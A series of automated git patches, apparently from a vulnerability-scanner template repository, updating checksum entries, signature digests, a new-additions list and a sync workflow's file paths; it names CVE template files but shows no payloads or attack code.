+http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:7431bdf1ec1dd11a0ce83200c4e7eecf9035f15c +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e54b87b0d1993c70a1e79f3586f4b5fcc1f69a1b +http/technologies/wordpress/plugins/sucuri-scanner.yaml:72984603e4f105d8eec4f0ec74fcb882b5feecb9 +http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c82e6a886de6dd292ba78f68a5edbb100b802f68 +http/technologies/wordpress/plugins/tablepress.yaml:12a209f39e5d6c5a0ef1273bd990d53400f7477d +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:640cd544c1c6aa44da2d1c41d6e62b909e223cde +http/technologies/wordpress/plugins/templately.yaml:75907b9782d70a0b15bf233ab05b9dcb9fc1a7ae +http/technologies/wordpress/plugins/the-events-calendar.yaml:98f71a2686e68c36f087f762007a51efafb782e1 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:8f4358301a38628a2ccf5a6daef44def124d7189 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:4bff59b48f7139ec8dcbf2d14354b692b74b335f +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:c0886c23d9a8291ee06dc643a8e62af1ca0354b5 +http/technologies/wordpress/plugins/under-construction-page.yaml:47c02b2c5453a29ea422b70e57c3dc45b0f734fd http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:1764b3b37065c0af6c554171dfcc10792e0c5218 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:1e08b06e54eb3400dcf8032cbe3d3560f1868e3a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:34d7011ca6ba5dc06fdc60b30eda88ddf49fe3e1 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:e2b5f4e45bb9362be1d7cd52d26240127fe0406d +http/technologies/wordpress/plugins/webp-express.yaml:deda558254c7bb7ec3502a4f0a0d2cb82a534b60 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:09b5bb138eb5c0d82e39401cdfca5fbb450f75b5 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:54ba6ea96a891b73a797f2d640ad80983772c45c +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:d1f0884ba3e2c41f15324f627bf299b2ceec25d7 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:e94a04f58201c61f74360ce2d429191ff8bbef4a http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c02d8b8907167efc1957f4bb90b3865efa050489 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:bcce8f61b06ab4e7860b8965ba66d12d27e5e072 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:c245c089a83d7b886f599c7aee6b213dec672fba +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:be918c0fbc91f2a05a507a4109eb3b8321282ee9 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4314caa3d6967b53baa3faee5bfaf0865ea33cbb +http/technologies/wordpress/plugins/woocommerce-services.yaml:dc6dc2f31fb27d17a9b2c181afd70f8329f3553a +http/technologies/wordpress/plugins/woocommerce.yaml:6f88d2aa6f14a89e4fe3fd4b03546be6c221c14f +http/technologies/wordpress/plugins/wordfence.yaml:a7dbc70f71758b50f5e8e5541d168e13b0e31ebd +http/technologies/wordpress/plugins/wordpress-importer.yaml:6a70202c2965a18616513625fb01fe73e49d0daa +http/technologies/wordpress/plugins/wordpress-seo.yaml:64d417c0759af592d6f1207c635c05f2614b1e87 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:925e17a4bc0b5846249b0250e72140f9f9aa4b14 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:4d60f9bc688f5bcc53471a6efa1ae88339c4e5ab +http/technologies/wordpress/plugins/wp-file-manager.yaml:fedf1a15ff96e6bf4b4f726ab772e2c2fe9e0831 +http/technologies/wordpress/plugins/wp-google-maps.yaml:d1bf03acbf874ae4673386de463e9d75a2e9c43c +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d60f81c9e6ab1d24ddc6f35588fc45622b7fa215 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:daf12a156ae8d7c6c147cec18087fa7701259659 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:0c53b252e195671dd3a87b48dafba308561f52db +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:a97eeb8fb7952c4eb0522cb31812f2648b36f15e +http/technologies/wordpress/plugins/wp-optimize.yaml:c6d9e8669ca1b890e031bcaeb80d6aeaf380c2be +http/technologies/wordpress/plugins/wp-pagenavi.yaml:0b19cd3d8934acd4f9c674d9e9fdc0f22ba6da2c +http/technologies/wordpress/plugins/wp-reset.yaml:e8a73eda5c3734c8496b26fd1c045713336ba61e +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4e31ae559d8e414aaea3dd88e12a839f78dc60f5 +http/technologies/wordpress/plugins/wp-rollback.yaml:d334260671f7da5686ae5880d859c17fd4cc73fa +http/technologies/wordpress/plugins/wp-seopress.yaml:527eb2cf14508c3a38adbc4a745aabc23e705436 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:4a744e660d68ef8ff9d6be727e1e753de300248b +http/technologies/wordpress/plugins/wp-smushit.yaml:85909bdd00880e138f99cb746cc52509bab4997d +http/technologies/wordpress/plugins/wp-statistics.yaml:50dd652e2b870e320d1f3dfcc8466e58ffa42f60 +http/technologies/wordpress/plugins/wp-super-cache.yaml:c75585c11b43540c5be523f1fcc5c92d7e879699 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:184a0bca0d198ff725dae2f1851e442157973362 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:e929146b632d95b570d2260d1496dd6d24011b02 +http/technologies/wordpress/plugins/wpforms-lite.yaml:8e76acc5264bd0c2a903afacc47ff08b55e0c794 +http/technologies/wordpress/plugins/wps-hide-login.yaml:88ca9409423c21d5a189a1c9c07d4ca2720ab964 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:66b06918fc4c54c8e10cd6a222be50a58ce05e96 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:8b4ba30f1bc172790a73d0dacdad66477042488c http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8874,7 +8876,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c8932cc37db88668f0222cf912925722240b4934 +templates-checksum.txt:3b4bbaf1bf19bc120be7a20619a150b65501e272 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e811b7061362d39744f20fefbc957acf8abda794 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:47:28 +0000 Subject: [PATCH 1226/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2592a9098f..adbd1e5b09 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' + - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From 69c492fdd1bbf1f64fb31e7e79ac7db499aef64d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:48:25 +0000 Subject: [PATCH 1227/1841] Auto Template Signing [Mon Jul 15 04:48:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5217.yaml | 1 + http/misconfiguration/servicenow-title-injection.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index 5f5f3502d6..a82ea1a866 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100bd7021d66da3ea62115899f8a80baafb14308996dd48db662b8f97f06ec9a478022100b2401925d9ebe433c7487e337c23f056a15aa00a9e243fed3206122d7736976e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index 12c5ba8f5d..8c735b8ffd 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022028775a2bdbb0790a013e05fdc3901fa59ad612c2ebc01a9f8049fb0b0387d0bc0220539a0a3b9993a72a394cdeb797947af93d8f1c0bb87bf31dead817b6a9d18a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 63879d0d2fcf96aa55f1dacb180cf498a7f476da Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:25:33 +0000 Subject: [PATCH 1228/1841] Auto Generated New Template Addition List [Mon Jul 15 05:25:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ee9a11893a..151416faea 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml +http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml From 8311fe2507a7a7e5457e011af4d7969c142cd962 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:25:38 +0000 Subject: [PATCH 1229/1841] Auto Generated Templates Checksum [Mon Jul 15 05:25:38 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6888ca621e..f29edf975a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3323,6 +3323,7 @@ http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 +http/cves/2023/CVE-2023-48728.yaml:676ba5671734f78ff5a987b5931ea087e49d911d http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -3495,7 +3496,7 @@ http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 -http/cves/2024/CVE-2024-5217.yaml:fb8c78c0785c6975ce0706b89ff8e911d9e022e6 +http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -5917,7 +5918,7 @@ http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f http/misconfiguration/seq-dashboard-unath.yaml:c8f87c43bbc194440decf9a5a58444279b11fb5d http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 -http/misconfiguration/servicenow-title-injection.yaml:8cdd5a1a8081cc7a66789662570f9a1f533d49da +http/misconfiguration/servicenow-title-injection.yaml:6e2f091a40860419e5be19393caf23c1ef608ffa http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d @@ -8876,7 +8877,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3b4bbaf1bf19bc120be7a20619a150b65501e272 +templates-checksum.txt:9033ee0493cca80c81acd777356098cbb6dc2beb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 937444955b1ee1cd773e76cea55cb1021c5edaac Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:26:27 +0000 Subject: [PATCH 1230/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index adbd1e5b09..b7709e0846 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' + - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From 65b6744381d7546d9bff156617190ef2842ef8b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:27:21 +0000 Subject: [PATCH 1231/1841] Auto Template Signing [Mon Jul 15 05:27:21 UTC 2024] :robot: --- http/cves/2023/CVE-2023-48728.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-48728.yaml b/http/cves/2023/CVE-2023-48728.yaml index 46d3b183ad..fc4b5d8ecd 100644 --- a/http/cves/2023/CVE-2023-48728.yaml +++ b/http/cves/2023/CVE-2023-48728.yaml @@ -41,3 +41,4 @@ http: - 'status_code == 200 || status_code == 500' - 'contains(header, "text/html")' condition: and +# digest: 4b0a00483046022100b3f243978a7668c139e66d6a06da1195e871eb3b208bd63d318d18a23c4340b8022100bce3df29ca987ce9097f1da4dd2fb477455648ed5ec4068c7958bed3c28de820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4b7404658c06d5e5406a32479de28ca875183f08 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:27:43 +0000 Subject: [PATCH 1233/1841] Auto Generated Templates Checksum [Mon Jul 15 05:27:43 UTC 2024] :robot: --- templates-checksum.txt | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f29edf975a..a492baab00 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -974,7 +974,7 @@ http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 -http/cnvd/2021/CNVD-2021-15824.yaml:111185f7d3cb57f2493ddddcbebdeb89edaf17e6 +http/cnvd/2021/CNVD-2021-15824.yaml:f2c942015bfe6963cf4bc852a8ef223241838ddd http/cnvd/2021/CNVD-2021-17369.yaml:c6641a046b08f57aa90ed4aca983da8265404f8c http/cnvd/2021/CNVD-2021-26422.yaml:3e323f0417f5e29dde9543fbb5ecbfe4dbcc6303 http/cnvd/2021/CNVD-2021-28277.yaml:68aff5e8d0140815c4acfff946b3f46f69f184b2 @@ -8020,7 +8020,6 @@ http/vulnerabilities/other/ecsimagingpacs-rce.yaml:225ae97e89c774cfaff636a3f7f71 http/vulnerabilities/other/eibiz-lfi.yaml:cbf9aa62b6d93b0b8cc1ab70dd1fa1b7da422c9e http/vulnerabilities/other/elFinder-path-traversal.yaml:9c9ea74d1312aada35ec1821961113c8e1d37afa http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:7b2eac74efc5e020858690936c34ea3c3879b3f9 -http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0ad19302 http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d http/vulnerabilities/other/enjoyrmis-sqli.yaml:10b4c83409aa50fed78065b26ab34a7c8f6aa631 http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 @@ -8877,7 +8876,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9033ee0493cca80c81acd777356098cbb6dc2beb +templates-checksum.txt:eb89861e6e2bd8b435d28f1a536008b717467c11 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae0044bc797e1efe266984fe407cdf07d33099e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:28:35 +0000 Subject: [PATCH 1234/1841] Auto Generated New Template Addition List [Mon Jul 15 05:28:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 151416faea..5fc78c679e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-45269.yaml +http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2023/CVE-2023-48728.yaml From ac9e4c8bbe2deaf4b72bca8d58692ae8904749d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:28:42 +0000 Subject: [PATCH 1235/1841] Auto Generated Templates Checksum [Mon Jul 15 05:28:42 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a492baab00..43c260e780 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3115,6 +3115,7 @@ http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a +http/cves/2023/CVE-2023-29204.yaml:c8e21ff3c03734685069d76093b69a2ae414d7a7 http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 http/cves/2023/CVE-2023-29300.yaml:92d57be27eb447fc6bd0912c30df002d7407a300 http/cves/2023/CVE-2023-29357.yaml:0ab57ac3d6597a932b316bc1dfdb6dded4854294 @@ -3323,7 +3324,7 @@ http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 -http/cves/2023/CVE-2023-48728.yaml:676ba5671734f78ff5a987b5931ea087e49d911d +http/cves/2023/CVE-2023-48728.yaml:30a8054088b9835c1b5c380b03420d54424ae4fd http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -8876,7 +8877,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb89861e6e2bd8b435d28f1a536008b717467c11 +templates-checksum.txt:e8c32bfa7093ffc5a2a4b1f2d90e7c99d6de8e47 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From be3a77762c30b753234aed3d494177a066a035c7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:29:29 +0000 Subject: [PATCH 1236/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b7709e0846..58a67fbf9b 100644 --- a/.github/workflows/templates-sync.yml +++ 